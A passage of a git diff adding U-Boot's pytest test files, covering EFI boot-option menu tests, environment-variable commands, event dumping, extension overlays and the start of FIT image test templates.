press_up_down_enter_and_wait(0, 0, True, 'host 0:1') + # Select 'host 0:1' + press_up_down_enter_and_wait(0, 0, True, 'Quit') + # Press down key to select "initrd-1.img" entry followed by the enter key + press_up_down_enter_and_wait(0, 0, True, 'Quit') + + # Set optional_data + press_up_down_enter_and_wait(0, 3, True, 'Optional Data:') + # Send Description user input, press ENTER key to complete + send_user_input_and_wait('nocolor', None) + for i in ('Description: test 1', 'File: host 0:1/initrddump.efi', + 'Initrd File: host 0:1/initrd-1.img', 'Optional Data: nocolor', 'Save', 'Quit'): + ubman.p.expect([i]) + + # Save the Boot Option + 
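+        # Four DOWN presses are expected to select the fifth entry ('Save') of
+        # the Description/File/Initrd File/Optional Data/Save/Quit menu shown
+        # above; ENTER then stores the new boot option.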
press_up_down_enter_and_wait(0, 4, True, None) + check_current_is_maintenance_menu() + + # Check the newly added Boot Option is handled correctly + # Return to U-Boot console + press_escape_key(True) + ubman.run_command(cmd = 'bootefi bootmgr') + response = ubman.run_command(cmd = 'load', wait_for_echo=False) + assert 'crc32: 0x181464af' in response + ubman.run_command(cmd = 'exit', wait_for_echo=False) + + # + # Test Case 4: Add second Boot Option and load it + # + ubman.run_command('eficonfig', wait_for_prompt=False) + + # Select 'Add Boot Option' + press_up_down_enter_and_wait(0, 0, True, 'Quit') + + # Press the enter key to select 'Description:' entry, then enter Description + press_up_down_enter_and_wait(0, 0, True, 'Enter description:') + # Send Description user input, press ENTER key to complete + send_user_input_and_wait('test 2', 'Quit') + + # Set EFI image(initrddump.efi) + press_up_down_enter_and_wait(0, 1, True, 'Quit') + press_up_down_enter_and_wait(0, 0, True, 'host 0:1') + # Select 'host 0:1' + press_up_down_enter_and_wait(0, 0, True, 'Quit') + # Press down key to select "initrddump.efi" entry followed by the enter key + press_up_down_enter_and_wait(0, 2, True, 'Quit') + + # Set Initrd file(initrd-2.img) + press_up_down_enter_and_wait(0, 2, True, 'Quit') + press_up_down_enter_and_wait(0, 0, True, 'host 0:1') + # Select 'host 0:1' + press_up_down_enter_and_wait(0, 0, True, 'Quit') + # Press down key to select "initrd-2.img" entry followed by the enter key + press_up_down_enter_and_wait(0, 1, True, 'Quit') + + # Set optional_data + press_up_down_enter_and_wait(0, 3, True, 'Optional Data:') + # Send Description user input, press ENTER key to complete + send_user_input_and_wait('nocolor', None) + for i in ('Description: test 2', 'File: host 0:1/initrddump.efi', + 'Initrd File: host 0:1/initrd-2.img', 'Optional Data: nocolor', 'Save', 'Quit'): + ubman.p.expect([i]) + + # Save the Boot Option + press_up_down_enter_and_wait(0, 4, True, 'Quit') + + # Change the Boot Order + press_up_down_enter_and_wait(0, 2, True, 'Quit') + press_up_down_enter_and_wait(0, 1, False, 'Quit') + # move 'test 1' to the second entry + ubman.run_command(cmd='+', wait_for_prompt=False, + wait_for_echo=False, send_nl=False) + for i in ('test 2', 'test 1', 'host 0:1', 'Save', 'Quit'): + ubman.p.expect([i]) + # Save the BootOrder + press_up_down_enter_and_wait(0, 3, True, None) + check_current_is_maintenance_menu() + + # Check the newly added Boot Option is handled correctly + # Return to U-Boot console + press_escape_key(True) + ubman.run_command(cmd = 'bootefi bootmgr') + response = ubman.run_command(cmd = 'load', wait_for_echo=False) + assert 'crc32: 0x811d3515' in response + ubman.run_command(cmd = 'exit', wait_for_echo=False) + + # + # Test Case 5: Change BootOrder and load it + # + ubman.run_command('eficonfig', wait_for_prompt=False) + + # Change the Boot Order + press_up_down_enter_and_wait(0, 2, True, None) + # Check the current BootOrder + for i in ('test 2', 'test 1', 'host 0:1', 'Save', 'Quit'): + ubman.p.expect([i]) + # move 'test 2' to the second entry + ubman.run_command(cmd='-', wait_for_prompt=False, + wait_for_echo=False, send_nl=False) + for i in ('test 1', 'test 2', 'host 0:1', 'Save', 'Quit'): + ubman.p.expect([i]) + # Save the BootOrder + press_up_down_enter_and_wait(0, 2, True, None) + check_current_is_maintenance_menu() + + # Return to U-Boot console + press_escape_key(True) + ubman.run_command(cmd = 'bootefi bootmgr') + response = ubman.run_command(cmd = 'load', wait_for_echo=False) + 
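+        # initrddump.efi's 'load' command prints the CRC32 of the initrd it
+        # loaded; 0x181464af is the value checked for initrd-1.img in Test
+        # Case 3, so 'test 1' is expected to boot first after the reordering.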
assert 'crc32: 0x181464af' in response + ubman.run_command(cmd = 'exit', wait_for_echo=False) + + # + # Test Case 6: Delete Boot Option(label:test 2) + # + ubman.run_command('eficonfig', wait_for_prompt=False) + + # Select 'Delete Boot Option' + press_up_down_enter_and_wait(0, 3, True, None) + # Check the current BootOrder + for i in ('test 1', 'test 2', 'Quit'): + ubman.p.expect([i]) + + # Delete 'test 2' + press_up_down_enter_and_wait(0, 1, True, None) + for i in ('test 1', 'Quit'): + ubman.p.expect([i]) + press_escape_key(False) + check_current_is_maintenance_menu() + # Return to U-Boot console + press_escape_key(True) + + # + # Test Case 7: Edit Boot Option + # + ubman.run_command('eficonfig', wait_for_prompt=False) + # Select 'Edit Boot Option' + press_up_down_enter_and_wait(0, 1, True, None) + # Check the current BootOrder + for i in ('test 1', 'Quit'): + ubman.p.expect([i]) + press_up_down_enter_and_wait(0, 0, True, None) + for i in ('Description: test 1', 'File: host 0:1/initrddump.efi', + 'Initrd File: host 0:1/initrd-1.img', 'Optional Data: nocolor', 'Save', 'Quit'): + ubman.p.expect([i]) + + # Press the enter key to select 'Description:' entry, then enter Description + press_up_down_enter_and_wait(0, 0, True, 'Enter description:') + # Send Description user input, press ENTER key to complete + send_user_input_and_wait('test 3', 'Quit') + + # Set EFI image(initrddump.efi) + press_up_down_enter_and_wait(0, 1, True, 'Quit') + press_up_down_enter_and_wait(0, 0, True, 'host 0:1') + # Select 'host 0:1' + press_up_down_enter_and_wait(0, 0, True, 'Quit') + # Press down key to select "initrddump.efi" entry followed by the enter key + press_up_down_enter_and_wait(0, 2, True, 'Quit') + + # Set Initrd file(initrd-2.img) + press_up_down_enter_and_wait(0, 2, True, 'Quit') + press_up_down_enter_and_wait(0, 0, True, 'host 0:1') + # Select 'host 0:1' + press_up_down_enter_and_wait(0, 0, True, 'Quit') + # Press down key to select "initrd-1.img" entry followed by the enter key + press_up_down_enter_and_wait(0, 1, True, 'Quit') + + # Set optional_data + press_up_down_enter_and_wait(0, 3, True, 'Optional Data:') + # Send Description user input, press ENTER key to complete + send_user_input_and_wait('', None) + for i in ('Description: test 3', 'File: host 0:1/initrddump.efi', + 'Initrd File: host 0:1/initrd-2.img', 'Optional Data:', 'Save', 'Quit'): + ubman.p.expect([i]) + + # Save the Boot Option + press_up_down_enter_and_wait(0, 4, True, 'Quit') + press_escape_key(False) + check_current_is_maintenance_menu() + + # Check the updated Boot Option is handled correctly + # Return to U-Boot console + press_escape_key(True) + ubman.run_command(cmd = 'bootefi bootmgr') + response = ubman.run_command(cmd = 'load', wait_for_echo=False) + assert 'crc32: 0x811d3515' in response + ubman.run_command(cmd = 'exit', wait_for_echo=False) + + # + # Test Case 8: Delete Boot Option(label:test 3) + # + ubman.run_command('eficonfig', wait_for_prompt=False) + + # Select 'Delete Boot Option' + press_up_down_enter_and_wait(0, 3, True, None) + # Check the current BootOrder + for i in ('test 3', 'Quit'): + ubman.p.expect([i]) + + # Delete 'test 3' + press_up_down_enter_and_wait(0, 0, True, 'Quit') + press_escape_key(False) + check_current_is_maintenance_menu() + # Return to U-Boot console + press_escape_key(True) + + # remove the host device + ubman.run_command(cmd = f'host bind -r 0') + + # + # Test Case 9: No block device found + # + ubman.run_command('eficonfig', wait_for_prompt=False) + + # Select 'Add Boot Option' + 
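+        # The host block device was unbound above, so descending into the
+        # file selection below should report 'No block device found!' rather
+        # than listing 'host 0:1'.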
press_up_down_enter_and_wait(0, 0, True, 'Quit') + + # Set EFI image + press_up_down_enter_and_wait(0, 1, True, 'Quit') + press_up_down_enter_and_wait(0, 0, True, 'No block device found!') + press_escape_key(False) + press_escape_key(False) + check_current_is_maintenance_menu() + # Return to U-Boot console + press_escape_key(True) diff --git a/test/py/tests/test_env.py b/test/py/tests/test_env.py new file mode 100644 index 00000000000..383e26c03b0 --- /dev/null +++ b/test/py/tests/test_env.py @@ -0,0 +1,650 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2015 Stephen Warren +# Copyright (c) 2015-2016, NVIDIA CORPORATION. All rights reserved. + +""" +Test operation of shell commands relating to environment variables. +""" + +import os +import os.path +import re +from subprocess import call, CalledProcessError +import tempfile + +import pytest +import utils + +# FIXME: This might be useful for other tests; +# perhaps refactor it into ConsoleBase or some other state object? +class StateTestEnv(object): + """Container that represents the state of all U-Boot environment variables. + This enables quick determination of existant/non-existant variable + names. + """ + + def __init__(self, ubman): + """Initialize a new StateTestEnv object. + + Args: + ubman: A U-Boot console. + + Returns: + Nothing. + """ + + self.ubman = ubman + self.get_env() + self.set_var = self.get_non_existent_var() + + def get_env(self): + """Read all current environment variables from U-Boot. + + Args: + None. + + Returns: + Nothing. + """ + + if self.ubman.config.buildconfig.get( + 'config_version_variable', 'n') == 'y': + with self.ubman.disable_check('main_signon'): + response = self.ubman.run_command('printenv') + else: + response = self.ubman.run_command('printenv') + self.env = {} + for l in response.splitlines(): + if not '=' in l: + continue + (var, value) = l.split('=', 1) + self.env[var] = value + + def get_existent_var(self): + """Return the name of an environment variable that exists. + + Args: + None. + + Returns: + The name of an environment variable. + """ + + for var in self.env: + return var + + def get_non_existent_var(self): + """Return the name of an environment variable that does not exist. + + Args: + None. + + Returns: + The name of an environment variable. + """ + + n = 0 + while True: + var = 'test_env_' + str(n) + if var not in self.env: + return var + n += 1 + +ste = None +@pytest.fixture(scope='function') +def state_test_env(ubman): + """pytest fixture to provide a StateTestEnv object to tests.""" + + global ste + if not ste: + ste = StateTestEnv(ubman) + return ste + +def unset_var(state_test_env, var): + """Unset an environment variable. + + This both executes a U-Boot shell command and updates a StateTestEnv + object. + + Args: + state_test_env: The StateTestEnv object to update. + var: The variable name to unset. + + Returns: + Nothing. + """ + + state_test_env.ubman.run_command('setenv %s' % var) + if var in state_test_env.env: + del state_test_env.env[var] + +def set_var(state_test_env, var, value): + """Set an environment variable. + + This both executes a U-Boot shell command and updates a StateTestEnv + object. + + Args: + state_test_env: The StateTestEnv object to update. + var: The variable name to set. + value: The value to set the variable to. + + Returns: + Nothing. 
+ """ + + bc = state_test_env.ubman.config.buildconfig + if bc.get('config_hush_parser', None): + quote = '"' + else: + quote = '' + if ' ' in value: + pytest.skip('Space in variable value on non-Hush shell') + + state_test_env.ubman.run_command( + 'setenv %s %s%s%s' % (var, quote, value, quote)) + state_test_env.env[var] = value + +def validate_empty(state_test_env, var): + """Validate that a variable is not set, using U-Boot shell commands. + + Args: + var: The variable name to test. + + Returns: + Nothing. + """ + + response = state_test_env.ubman.run_command('echo ${%s}' % var) + assert response == '' + +def validate_set(state_test_env, var, value): + """Validate that a variable is set, using U-Boot shell commands. + + Args: + var: The variable name to test. + value: The value the variable is expected to have. + + Returns: + Nothing. + """ + + # echo does not preserve leading, internal, or trailing whitespace in the + # value. printenv does, and hence allows more complete testing. + response = state_test_env.ubman.run_command('printenv %s' % var) + assert response == ('%s=%s' % (var, value)) + +@pytest.mark.boardspec('sandbox') +def test_env_initial_env_file(ubman): + """Test that the u-boot-initial-env make target works""" + builddir = 'O=' + ubman.config.build_dir + envfile = ubman.config.build_dir + '/u-boot-initial-env' + + # remove if already exists from an older run + try: + os.remove(envfile) + except: + pass + + utils.run_and_log(ubman, ['make', builddir, 'u-boot-initial-env']) + + assert os.path.exists(envfile) + + # assume that every environment has a board variable, e.g. board=sandbox + with open(envfile, 'r') as file: + env = file.read() + regex = re.compile('board=.+\\n') + assert re.search(regex, env) + +def test_env_echo_exists(state_test_env): + """Test echoing a variable that exists.""" + + var = state_test_env.get_existent_var() + value = state_test_env.env[var] + validate_set(state_test_env, var, value) + +@pytest.mark.buildconfigspec('cmd_echo') +def test_env_echo_non_existent(state_test_env): + """Test echoing a variable that doesn't exist.""" + + var = state_test_env.set_var + validate_empty(state_test_env, var) + +def test_env_printenv_non_existent(state_test_env): + """Test printenv error message for non-existant variables.""" + + var = state_test_env.set_var + c = state_test_env.ubman + with c.disable_check('error_notification'): + response = c.run_command('printenv %s' % var) + assert response == '## Error: "%s" not defined' % var + +@pytest.mark.buildconfigspec('cmd_echo') +def test_env_unset_non_existent(state_test_env): + """Test unsetting a nonexistent variable.""" + + var = state_test_env.get_non_existent_var() + unset_var(state_test_env, var) + validate_empty(state_test_env, var) + +def test_env_set_non_existent(state_test_env): + """Test set a non-existant variable.""" + + var = state_test_env.set_var + value = 'foo' + set_var(state_test_env, var, value) + validate_set(state_test_env, var, value) + +def test_env_set_existing(state_test_env): + """Test setting an existant variable.""" + + var = state_test_env.set_var + value = 'bar' + set_var(state_test_env, var, value) + validate_set(state_test_env, var, value) + +@pytest.mark.buildconfigspec('cmd_echo') +def test_env_unset_existing(state_test_env): + """Test unsetting a variable.""" + + var = state_test_env.set_var + unset_var(state_test_env, var) + validate_empty(state_test_env, var) + +def test_env_expansion_spaces(state_test_env): + """Test expanding a variable that contains a space in its value.""" 
+ + var_space = None + var_test = None + try: + var_space = state_test_env.get_non_existent_var() + set_var(state_test_env, var_space, ' ') + + var_test = state_test_env.get_non_existent_var() + value = ' 1${%(var_space)s}${%(var_space)s} 2 ' % locals() + set_var(state_test_env, var_test, value) + value = ' 1 2 ' + validate_set(state_test_env, var_test, value) + finally: + if var_space: + unset_var(state_test_env, var_space) + if var_test: + unset_var(state_test_env, var_test) + +@pytest.mark.buildconfigspec('cmd_importenv') +def test_env_import_checksum_no_size(state_test_env): + """Test that omitted ('-') size parameter with checksum validation fails the + env import function. + """ + c = state_test_env.ubman + ram_base = utils.find_ram_base(state_test_env.ubman) + addr = '%08x' % ram_base + + with c.disable_check('error_notification'): + response = c.run_command('env import -c %s -' % addr) + assert response == '## Error: external checksum format must pass size' + +@pytest.mark.buildconfigspec('cmd_importenv') +def test_env_import_whitelist_checksum_no_size(state_test_env): + """Test that omitted ('-') size parameter with checksum validation fails the + env import function when variables are passed as parameters. + """ + c = state_test_env.ubman + ram_base = utils.find_ram_base(state_test_env.ubman) + addr = '%08x' % ram_base + + with c.disable_check('error_notification'): + response = c.run_command('env import -c %s - foo1 foo2 foo4' % addr) + assert response == '## Error: external checksum format must pass size' + +@pytest.mark.buildconfigspec('cmd_exportenv') +@pytest.mark.buildconfigspec('cmd_importenv') +def test_env_import_whitelist(state_test_env): + """Test importing only a handful of env variables from an environment.""" + c = state_test_env.ubman + ram_base = utils.find_ram_base(state_test_env.ubman) + addr = '%08x' % ram_base + + set_var(state_test_env, 'foo1', 'bar1') + set_var(state_test_env, 'foo2', 'bar2') + set_var(state_test_env, 'foo3', 'bar3') + + c.run_command('env export %s' % addr) + + unset_var(state_test_env, 'foo1') + set_var(state_test_env, 'foo2', 'test2') + set_var(state_test_env, 'foo4', 'bar4') + + # no foo1 in current env, foo2 overridden, foo3 should be of the value + # before exporting and foo4 should be of the value before importing. + c.run_command('env import %s - foo1 foo2 foo4' % addr) + + validate_set(state_test_env, 'foo1', 'bar1') + validate_set(state_test_env, 'foo2', 'bar2') + validate_set(state_test_env, 'foo3', 'bar3') + validate_set(state_test_env, 'foo4', 'bar4') + + # Cleanup test environment + unset_var(state_test_env, 'foo1') + unset_var(state_test_env, 'foo2') + unset_var(state_test_env, 'foo3') + unset_var(state_test_env, 'foo4') + +@pytest.mark.buildconfigspec('cmd_exportenv') +@pytest.mark.buildconfigspec('cmd_importenv') +def test_env_import_whitelist_delete(state_test_env): + + """Test importing only a handful of env variables from an environment, with. + deletion if a var A that is passed to env import is not in the + environment to be imported. 
+ """ + c = state_test_env.ubman + ram_base = utils.find_ram_base(state_test_env.ubman) + addr = '%08x' % ram_base + + set_var(state_test_env, 'foo1', 'bar1') + set_var(state_test_env, 'foo2', 'bar2') + set_var(state_test_env, 'foo3', 'bar3') + + c.run_command('env export %s' % addr) + + unset_var(state_test_env, 'foo1') + set_var(state_test_env, 'foo2', 'test2') + set_var(state_test_env, 'foo4', 'bar4') + + # no foo1 in current env, foo2 overridden, foo3 should be of the value + # before exporting and foo4 should be empty. + c.run_command('env import -d %s - foo1 foo2 foo4' % addr) + + validate_set(state_test_env, 'foo1', 'bar1') + validate_set(state_test_env, 'foo2', 'bar2') + validate_set(state_test_env, 'foo3', 'bar3') + validate_empty(state_test_env, 'foo4') + + # Cleanup test environment + unset_var(state_test_env, 'foo1') + unset_var(state_test_env, 'foo2') + unset_var(state_test_env, 'foo3') + unset_var(state_test_env, 'foo4') + +@pytest.mark.buildconfigspec('cmd_nvedit_info') +def test_env_info(state_test_env): + + """Test 'env info' command with all possible options. + """ + c = state_test_env.ubman + + response = c.run_command('env info') + nb_line = 0 + for l in response.split('\n'): + if 'env_valid = ' in l: + assert '= invalid' in l or '= valid' in l or '= redundant' in l + nb_line += 1 + elif 'env_ready =' in l or 'env_use_default =' in l: + assert '= true' in l or '= false' in l + nb_line += 1 + else: + assert True + assert nb_line == 3 + + response = c.run_command('env info -p -d') + assert 'Default environment is used' in response or \ + "Environment was loaded from persistent storage" in response + assert 'Environment can be persisted' in response or \ + "Environment cannot be persisted" in response + + response = c.run_command('env info -p -d -q') + assert response == "" + + response = c.run_command('env info -p -q') + assert response == "" + + response = c.run_command('env info -d -q') + assert response == "" + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_nvedit_info') +@pytest.mark.buildconfigspec('cmd_echo') +def test_env_info_sandbox(state_test_env): + """Test 'env info' command result with several options on sandbox + with a known ENV configuration: ready & default & persistent + """ + c = state_test_env.ubman + + response = c.run_command('env info') + assert 'env_ready = true' in response + assert 'env_use_default = true' in response + + response = c.run_command('env info -p -d') + assert 'Default environment is used' in response + assert 'Environment cannot be persisted' in response + + response = c.run_command('env info -d -q') + response = c.run_command('echo $?') + assert response == "0" + + response = c.run_command('env info -p -q') + response = c.run_command('echo $?') + assert response == "1" + + response = c.run_command('env info -d -p -q') + response = c.run_command('echo $?') + assert response == "1" + +def mk_env_ext4(state_test_env): + + """Create a empty ext4 file system volume.""" + c = state_test_env.ubman + filename = 'env.ext4.img' + persistent = c.config.persistent_data_dir + '/' + filename + fs_img = c.config.result_dir + '/' + filename + + if os.path.exists(persistent): + c.log.action('Disk image file ' + persistent + ' already exists') + else: + # Some distributions do not add /sbin to the default PATH, where mkfs.ext4 lives + os.environ["PATH"] += os.pathsep + '/sbin' + try: + utils.run_and_log(c, 'dd if=/dev/zero of=%s bs=1M count=16' % persistent) + utils.run_and_log(c, 'mkfs.ext4 %s' % persistent) + sb_content = 
utils.run_and_log(c, 'tune2fs -l %s' % persistent) + if 'metadata_csum' in sb_content: + utils.run_and_log(c, 'tune2fs -O ^metadata_csum %s' % persistent) + except CalledProcessError: + call('rm -f %s' % persistent, shell=True) + raise + + utils.run_and_log(c, ['cp', '-f', persistent, fs_img]) + return fs_img + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_echo') +@pytest.mark.buildconfigspec('cmd_nvedit_info') +@pytest.mark.buildconfigspec('cmd_nvedit_load') +@pytest.mark.buildconfigspec('cmd_nvedit_select') +@pytest.mark.buildconfigspec('env_is_in_ext4') +def test_env_ext4(state_test_env): + + """Test ENV in EXT4 on sandbox.""" + c = state_test_env.ubman + fs_img = '' + try: + fs_img = mk_env_ext4(state_test_env) + + c.run_command('host bind 0 %s' % fs_img) + + response = c.run_command('ext4ls host 0:0') + assert 'uboot.env' not in response + + # force env location: EXT4 (prio 1 in sandbox) + response = c.run_command('env select EXT4') + assert 'Select Environment on EXT4: OK' in response + + response = c.run_command('env save') + assert 'Saving Environment to EXT4' in response + + response = c.run_command('env load') + assert 'Loading Environment from EXT4... OK' in response + + response = c.run_command('ext4ls host 0:0') + assert '8192 uboot.env' in response + + response = c.run_command('env info') + assert 'env_valid = valid' in response + assert 'env_ready = true' in response + assert 'env_use_default = false' in response + + response = c.run_command('env info -p -d') + assert 'Environment was loaded from persistent storage' in response + assert 'Environment can be persisted' in response + + response = c.run_command('env info -d -q') + assert response == "" + response = c.run_command('echo $?') + assert response == "1" + + response = c.run_command('env info -p -q') + assert response == "" + response = c.run_command('echo $?') + assert response == "0" + + response = c.run_command('env erase') + assert 'OK' in response + + response = c.run_command('env load') + assert 'Loading Environment from EXT4... ' in response + assert 'bad CRC, using default environment' in response + + response = c.run_command('env info') + assert 'env_valid = invalid' in response + assert 'env_ready = true' in response + assert 'env_use_default = true' in response + + response = c.run_command('env info -p -d') + assert 'Default environment is used' in response + assert 'Environment can be persisted' in response + + # restore env location: NOWHERE (prio 0 in sandbox) + response = c.run_command('env select nowhere') + assert 'Select Environment on nowhere: OK' in response + + response = c.run_command('env load') + assert 'Loading Environment from nowhere... 
OK' in response + + response = c.run_command('env info') + assert 'env_valid = invalid' in response + assert 'env_ready = true' in response + assert 'env_use_default = true' in response + + response = c.run_command('env info -p -d') + assert 'Default environment is used' in response + assert 'Environment cannot be persisted' in response + + finally: + if fs_img: + call('rm -f %s' % fs_img, shell=True) + +def test_env_text(ubman): + """Test the script that converts the environment to a text file""" + + def check_script(intext, expect_val): + """Check a test case + + Args: + intext: Text to pass to the script + expect_val: Expected value of the CONFIG_EXTRA_ENV_TEXT string, or + None if we expect it not to be defined + """ + with tempfile.TemporaryDirectory() as path: + fname = os.path.join(path, 'infile') + with open(fname, 'w') as inf: + print(intext, file=inf) + result = utils.run_and_log(ubman, ['awk', '-f', script, fname]) + if expect_val is not None: + expect = '#define CONFIG_EXTRA_ENV_TEXT "%s"\n' % expect_val + assert result == expect + else: + assert result == '' + + script = os.path.join(ubman.config.source_dir, 'scripts', 'env2string.awk') + + # simple script with a single var + check_script('fred=123', 'fred=123\\0') + + # no vars + check_script('', None) + + # two vars + check_script('''fred=123 +mary=456''', 'fred=123\\0mary=456\\0') + + # blank lines + check_script('''fred=123 + + +mary=456 + +''', 'fred=123\\0mary=456\\0') + + # append + check_script('''fred=123 +mary=456 +fred+= 456''', 'fred=123 456\\0mary=456\\0') + + # append from empty + check_script('''fred= +mary=456 +fred+= 456''', 'fred= 456\\0mary=456\\0') + + # variable with + in it + check_script('fred+mary=123', 'fred+mary=123\\0') + + # ignores variables that are empty + check_script('''fred= +fred+= +mary=456''', 'mary=456\\0') + + # single-character env name + check_script('''m=123 +e=456 +m+= 456''', 'e=456\\0m=123 456\\0') + + # contains quotes + check_script('''fred="my var" +mary=another"''', 'fred=\\"my var\\"\\0mary=another\\"\\0') + + # variable name ending in + + check_script('''fred\\+=my var +fred++= again''', 'fred+=my var again\\0') + + # variable name containing + + check_script('''fred+jane=both +fred+jane+=again +mary=456''', 'fred+jane=bothagain\\0mary=456\\0') + + # multi-line vars - new vars always start at column 1 + check_script('''fred=first + second +\tthird with tab + + after blank + confusing=oops +mary=another"''', 'fred=first second third with tab after blank confusing=oops\\0mary=another\\"\\0') + + # real-world example + check_script('''ubifs_boot= + env exists bootubipart || + env set bootubipart UBI; + env exists bootubivol || + env set bootubivol boot; + if ubi part ${bootubipart} && + ubifsmount ubi${devnum}:${bootubivol}; + then + devtype=ubi; + run scan_dev_for_boot; + fi +''', + 'ubifs_boot=env exists bootubipart || env set bootubipart UBI; ' + 'env exists bootubivol || env set bootubivol boot; ' + 'if ubi part ${bootubipart} && ubifsmount ubi${devnum}:${bootubivol}; ' + 'then devtype=ubi; run scan_dev_for_boot; fi\\0') diff --git a/test/py/tests/test_event_dump.py b/test/py/tests/test_event_dump.py new file mode 100644 index 00000000000..b9d48f54dc2 --- /dev/null +++ b/test/py/tests/test_event_dump.py @@ -0,0 +1,25 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright 2021 Google LLC +# Written by Simon Glass <sjg@chromium.org> + +import pytest +import re +import utils + +# This is only a partial test - coverting 64-bit sandbox. 
It does not test +# big-endian images, nor 32-bit images +@pytest.mark.boardspec('sandbox') +def test_event_dump(ubman): + """Test that the "help" command can be executed.""" + sandbox = ubman.config.build_dir + '/u-boot' + out = utils.run_and_log(ubman, ['scripts/event_dump.py', sandbox]) + expect = '''.*Event type Id Source location +-------------------- ------------------------------ ------------------------------ +EVT_FT_FIXUP bootmeth_vbe_ft_fixup .*boot/vbe_request.c:.* +EVT_FT_FIXUP bootmeth_vbe_simple_ft_fixup .*boot/vbe_simple_os.c:.* +EVT_LAST_STAGE_INIT alloc_write_acpi_tables .*lib/acpi/acpi_table.c:.* +EVT_LAST_STAGE_INIT efi_block_device_create .*lib/efi_driver/efi_block_device.c:.* +EVT_LAST_STAGE_INIT install_smbios_table .*lib/efi_loader/efi_smbios.c:.* +EVT_MISC_INIT_F sandbox_early_getopt_check .*arch/sandbox/cpu/start.c:.* +EVT_TEST h_adder_simple .*test/common/event.c:''' + assert re.match(expect, out, re.MULTILINE) is not None diff --git a/test/py/tests/test_extension.py b/test/py/tests/test_extension.py new file mode 100644 index 00000000000..61223496054 --- /dev/null +++ b/test/py/tests/test_extension.py @@ -0,0 +1,55 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2020 +# Author: Kory Maincent <kory.maincent@bootlin.com> + +# Test U-Boot's "extension" commands. + +import os +import pytest +import utils + +overlay_addr = 0x1000 + +SANDBOX_DTB='arch/sandbox/dts/sandbox.dtb' +OVERLAY_DIR='arch/sandbox/dts/' + +def load_dtb(ubman): + ubman.log.action('Loading devicetree to RAM...') + ubman.run_command('host load hostfs - $fdt_addr_r %s' % (os.path.join(ubman.config.build_dir, SANDBOX_DTB))) + ubman.run_command('fdt addr $fdt_addr_r') + +@pytest.mark.buildconfigspec('cmd_fdt') +@pytest.mark.boardspec('sandbox') +def test_extension(ubman): + """Test the 'extension' command.""" + + load_dtb(ubman) + + output = ubman.run_command('extension list') + # extension_bootdev_hunt may have already run. + # Without reboot we cannot make any assumption here. + # assert('No extension' in output) + + output = ubman.run_command('extension scan') + assert output == 'Found 2 extension board(s).' + + output = ubman.run_command('extension list') + assert('overlay0.dtbo' in output) + assert('overlay1.dtbo' in output) + + ubman.run_command_list([ + 'setenv extension_overlay_addr %s' % (overlay_addr), + 'setenv extension_overlay_cmd \'host load hostfs - ${extension_overlay_addr} %s${extension_overlay_name}\'' % (os.path.join(ubman.config.build_dir, OVERLAY_DIR))]) + + output = ubman.run_command('extension apply 0') + assert('bytes read' in output) + + output = ubman.run_command('fdt print') + assert('button3' in output) + + output = ubman.run_command('extension apply all') + assert('bytes read' in output) + + output = ubman.run_command('fdt print') + assert('button4' in output) + diff --git a/test/py/tests/test_fit.py b/test/py/tests/test_fit.py new file mode 100755 index 00000000000..619f73153a0 --- /dev/null +++ b/test/py/tests/test_fit.py @@ -0,0 +1,409 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2013, Google Inc. 
+# +# Sanity check of the FIT handling in U-Boot + +import os +import pytest +import struct +import utils +import fit_util + +# Define a base ITS which we can adjust using % and a dictionary +base_its = ''' +/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel-1 { + data = /incbin/("%(kernel)s"); + type = "kernel"; + arch = "sandbox"; + os = "linux"; + compression = "%(compression)s"; + load = <0x40000>; + entry = <0x8>; + }; + kernel-2 { + data = /incbin/("%(loadables1)s"); + type = "kernel"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + %(loadables1_load)s + entry = <0x0>; + }; + fdt-1 { + description = "snow"; + data = /incbin/("%(fdt)s"); + type = "flat_dt"; + arch = "sandbox"; + %(fdt_load)s + compression = "%(compression)s"; + signature-1 { + algo = "sha1,rsa2048"; + key-name-hint = "dev"; + }; + }; + ramdisk-1 { + description = "snow"; + data = /incbin/("%(ramdisk)s"); + type = "ramdisk"; + arch = "sandbox"; + os = "linux"; + %(ramdisk_load)s + compression = "%(compression)s"; + }; + ramdisk-2 { + description = "snow"; + data = /incbin/("%(loadables2)s"); + type = "ramdisk"; + arch = "sandbox"; + os = "linux"; + %(loadables2_load)s + compression = "none"; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel-1"; + fdt = "fdt-1"; + %(ramdisk_config)s + %(loadables_config)s + }; + }; +}; +''' + +# Define a base FDT - currently we don't use anything in this +base_fdt = ''' +/dts-v1/; + +/ { + #address-cells = <1>; + #size-cells = <0>; + + model = "Sandbox Verified Boot Test"; + compatible = "sandbox"; + + binman { + }; + + reset@0 { + compatible = "sandbox,reset"; + reg = <0>; + }; +}; +''' + +# This is the U-Boot script that is run for each test. First load the FIT, +# then run the 'bootm' command, then save out memory from the places where +# we expect 'bootm' to write things. Then quit. 
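+# The %(name)x/%(name)s placeholders are filled from the 'params' dictionary
+# built in run_fit_test() below; each 'host save' writes a memory region back
+# to a host file so it can be compared with the original input using
+# check_equal()/check_not_equal().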
